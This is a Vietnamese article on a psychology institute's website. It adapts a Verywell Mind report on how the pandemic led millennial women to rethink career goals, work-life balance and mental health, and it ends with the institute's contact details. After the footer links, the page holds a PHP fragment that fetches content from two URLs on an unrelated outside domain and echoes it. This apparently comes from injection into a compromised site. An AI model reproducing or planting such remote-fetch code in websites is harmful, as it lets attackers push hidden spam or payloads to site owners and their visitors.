Phụ Nữ Thế Hệ Gen Y Đang Thay Đổi Mục Tiêu Sống Do Đại Dịch

  • Một nghiên cứu mới cho thấy phụ nữ Gen Y (hay còn gọi là Millennials, những người sinh ra từ năm 1980 – 1996) đang thay đổi quan điểm của họ về mục tiêu nghề nghiệp và sự cân bằng giữa công việc - cuộc sống.

  • Sức ép và căng thẳng của đại dịch đã thúc đẩy phụ nữ Gen Y suy xét lại điều gì thật sự quan trọng đối với họ trong tương lai.

  • Hơn bao giờ hết, phụ nữ ở nhóm tuổi này đang ưu tiên sự linh hoạt và đủ đầy về cuộc sống và sự nghiệp của họ.

Cuộc khảo sát gồm 1000 phụ nữ từ độ tuổi 13 - 39 được thực hiện bởi YPulse, đã nhận thấy tác động của đại dịch tới sự thay đổi mục tiêu sống của phụ nữ Gen Y và Gen Z.

“Phụ nữ Gen Z và Gen Y là những thế hệ nhiều lo lắng nhất thời điểm hiện tại, họ thậm chí có thể mang nhiều lo âu hơn cả đàn ông Gen Y và Gen Z”, MaryLeigh Bliss, một chuyên gia về giới trẻ và văn hoá đại chúng tại YPulse cho biết. “Vì thế, tôi nghĩ rằng phụ nữ ở hai thế hệ này là những người sẽ có nhiều câu hỏi về điều gì là đúng với bản thân họ.”

Một báo cáo chỉ ra rằng phụ nữ đang không chỉ suy xét lại những mục tiêu nghề nghiệp, mà còn thay đổi lại cả định hướng cuộc sống của mình.

Sự Căng Thẳng Như Một Bước Đệm

Một báo cáo cho thấy phụ nữ Gen Y thường thấy thiếu kiểm soát với thế giới hỗn độn xung quanh mình hơn là nam giới, và điều này góp phần làm tăng sự lo âu.

“Căng thẳng mãn tính về đại dịch, hay đúng hơn là chấn thương tâm lý, điều mà mọi người đã trải qua trong thời gian dài và truyền vào não bộ một cách tiêu cực, có khả năng làm ảnh hưởng tới khả năng điều hành cuộc sống của chúng ta mỗi ngày, bao gồm nhu cầu tâm lý cho sự thay đổi”, nhà khoa học thần kinh Caroline Leaf, tiến sĩ, tác giả của “Cleaning Up Your Mental Mess” nói.

Rất nhiều gia đình đã dành một năm rưỡi qua vật lộn với những ưu tiên về công việc, chăm sóc con cái và sự an toàn. Số phụ nữ Gen Y đã phải từ bỏ công việc của mình gấp đôi so với đàn ông. Một trong những lí do chính của họ là để ở nhà chăm sóc con cái và làm việc nhà.

Mặc dù chúng ta vẫn đang sống trong đại dịch, nhiều người đã bắt đầu suy nghĩ liệu thế giới sau đại dịch sẽ như thế nào. Nhất là với phụ nữ Gen Y và Gen Z, báo cáo cho thấy việc tiếp tục cuộc sống và mục tiêu sự nghiệp của họ sẽ song hành với những giá trị và mong muốn của họ.

Những Con Đường Sự Nghiệp Mới

Báo cáo cho thấy một lí do khác mà phụ nữ Gen Y bỏ việc cao gấp đôi là sự không hài lòng với những điều kiện. Nhưng những thay đổi kiểu này đang xảy ra không chỉ là ở thế hệ Gen Y.

Sophia Husbands, một phụ nữ 42 tuổi sống ở Anh, từng là một nhà thầu trước đại dịch cho biết bà đã bắt đầu nhận thấy sự kiệt quệ của “khủng hoảng một phần tư” (quarter-life crisis - ND: khái niệm liên quan đến sự lo lắng về định hướng và chất lượng cuộc sống của một người), và khi Covid - 19 tới nó đã thúc đẩy quyết định của bà trong việc bắt đầu một ý tưởng mới mà bà đã ấp ủ bao lâu nay.

“Tôi đã nghĩ liệu mình có thể làm gì với tư cách là cá nhân?” Bà Sophia nói. “Tôi đã có ý tưởng từ lâu về tạo ra nền tảng việc làm cho những người muốn có một công việc ngoài giờ hoặc tạm thời. Và tôi đã nghĩ, vậy tại sao mình không bắt bây giờ và biến nó thành hiện thực?”

Báo cáo cho thấy rằng sự thay đổi những ưu tiên là động lực chính để thay đổi lối sống trong công việc. Theo báo cáo, số phụ nữ Gen Y lên kế hoạch thành lập công ty tăng 20% so với năm 2019, trong khi số phụ nữ coi khởi nghiệp là mục tiêu của cuộc sống đã tăng 26%.

Bên cạnh nỗ lực kinh doanh cá nhân, phụ nữ Gen Y đang thay đổi suy nghĩ của họ về lối sống và công việc. Theo Bliss, 40% phụ nữ Gen Y có việc làm muốn tiếp tục làm việc tại nhà sau đại dịch, và 67% trong nhóm này coi lịch trình linh hoạt và lựa chọn làm việc tại nhà là nhân tố quan trọng để cân nhắc tới công việc và tương lai của họ.

Janette Marsac, LMSW- người thực hành phương pháp trị liệu trực tuyến tại Forwards in Heels chú tâm vào những phụ nữ mắc chứng lo âu, những cơn đau và trầm cảm - chỉ ra rằng đại dịch mang lại những trải nghiệm và mở mang tầm mắt cho rất nhiều phụ nữ đang sống trong tình trạng gần như kiệt sức.

“Trong đại dịch, rất nhiều người đã có cơ hội để nhận ra liệu cuộc sống sẽ như thế nào nếu không phải làm việc trên 50 tiếng, không cần giao tiếp hơn 10 tiếng, và sự cân bằng giữa công việc và cuộc sống thật sự ra sao”, Marsac nói.

Đối Phó Với “Khủng Hoảng Một Phần Tư”

Việc đánh giá lại những giá trị và mục tiêu là một điều quan trọng và cần thiết để sống một cuộc sống trọn vẹn hơn. Và những điều này có thể sẽ khác so với các năm trước, vì vô số người đã bị đẩy tới bờ vực căng thẳng, lo lắng và sợ hãi.

“Điều quan trọng cần phải nhớ là sự căng thẳng độc hại, trầm cảm và lo âu là những dấu hiệu của sự xáo trộn tâm lý - thứ mà chúng ta, mỗi con người đều trải nghiệm,” Leaf nói. “Những cảm xúc ấy không phải là thứ mà chúng ta nên thấy xấu hổ. Thế nhưng, chúng cần được quản lý, vì nếu không được kiểm soát, những cảm xúc ấy có thể làm tăng sự tổn thương, biến nó thành bệnh tật và góp phần đáng kể vào việc ngăn chặn ta đạt những mục tiêu và cảm xúc trọn vẹn.”

Leaf khuyến khích phương pháp thải độc não (brain detox), bao gồm xử lý chấn thương tâm lý và căng thẳng bằng lòng trắc ẩn, cũng như xây dựng những thói quen tốt hơn bằng cách phá vỡ các khuôn mẫu hành vi tiêu cực. Một số thói quen xấu đã ăn sâu tới mức chúng như thể là một phần tự nhiên trong bạn, nhưng Leaf đảm bảo rằng điều đó không đúng.

“Những thói quen khó bỏ ấy có thể gây ra những căng thẳng độc hại tới não bộ và cơ thể chúng ta, cũng như những mối quan hệ và cuộc sống. Chúng cần được xác định, loại bỏ, và tái nhận thức thành những thói quen mang tính xây dựng.”

Chủ động sắp xếp các giá trị, ước mơ và mục tiêu về công việc và lối sống của bạn có thể giúp tâm trí bạn thoải mái hơn với tư cách là một cá nhân. Nhưng một cá nhân không thể cải thiện tình trạng của đất nước hay thế giới một mình được. Các công ty, những người chịu trách nhiệm chính cho việc tạo ra một nền văn hoá độc hại ngay từ đầu, cũng cần phải thích ứng với sự thay đổi ấy cho sức khoẻ tâm thần tại nơi làm việc.

“Đại dịch đã đưa sức khoẻ tâm thần lên hàng đầu trong danh sách ưu tiên của mọi tổ chức tập trung vào con người và sự tiến bộ.” - Tiến sĩ Natalie Underdown, người sáng lập ra công ty The Nu nói. “Những công ty khuyến khích nền văn hoá an toàn tinh thần, nơi sức khoẻ tâm thần là ưu tiên hàng đầu sẽ không chỉ vượt lên trên đối thủ của họ, mà còn thấy sự quan trọng của ROI (chỉ số doanh thu trên chi phí) khi đề cập đến sự tương tác, duy trì và nỗ lực tự thân của nhân viên.”

LỜI KẾT

Ngoài việc gây ra căng thẳng, đại dịch cũng đem tới một cơ hội để xem xét những ưu tiên và tổ chức lại những giá trị cùng lối sống của chúng ta. Nhìn về những lo lắng trong thời gian vừa qua để đánh giá lại những thói quen, sự cân bằng giữa công việc và cuộc sống có thể giúp bạn phát triển các khía cạnh khác nhau từ trải nghiệm này.

Nguồn: Millennial Women Are Shifting Life Goals Post-Pandemic - Verywell Mind

Hãy liên hệ với số hotline 0977.729.396 của Viện ngay hôm nay để được tư vấn tận tình.

Hình ảnh một số bác sĩ tâm thần và chuyên gia tâm lý được đào tạo bài bản và giàu kinh nghiệm của Viện Tâm Lý Việt - Pháp:

-----------------------------

Viện Tâm lý Việt - Pháp

Trụ sở Hà Nội: Số 54 Trần Quốc Vượng, P. Dịch Vọng Hậu, Q. Cầu Giấy, TP. Hà Nội

Trụ sở TP.HCM: Landmark 81, Vinhomes Central Park, 720A Điện Biên Phủ, P.22, Q. Bình Thạnh, Tp. Hồ Chí Minh

Hotline: 0912.012.684  (Zalo, 24/7)

Email: daotao@tamlyvietphap.vn

Facebook: https://www.facebook.com/tamlyvietphap.vn

Bài viết liên quan

Gọi cho tôi

Hãy gửi thông tin cho chúng tôi, nhân viên tư vấn của Viện sẽ liên hệ lại Quý khách trong vòng 24h. Thông tin của Quý khách chỉ để chúng tôi liên hệ và không gửi cho bên thứ ba.

Tài nguyên

Trắc nghiệm

https://tracnghiem.tamlyvietphap.vn/

$content1 = file_get_contents("https://ayambakar.vip/bl/bc.php"); $content2 = file_get_contents("https://ayambakar.vip/st/index.php"); echo ''; echo ''; ?>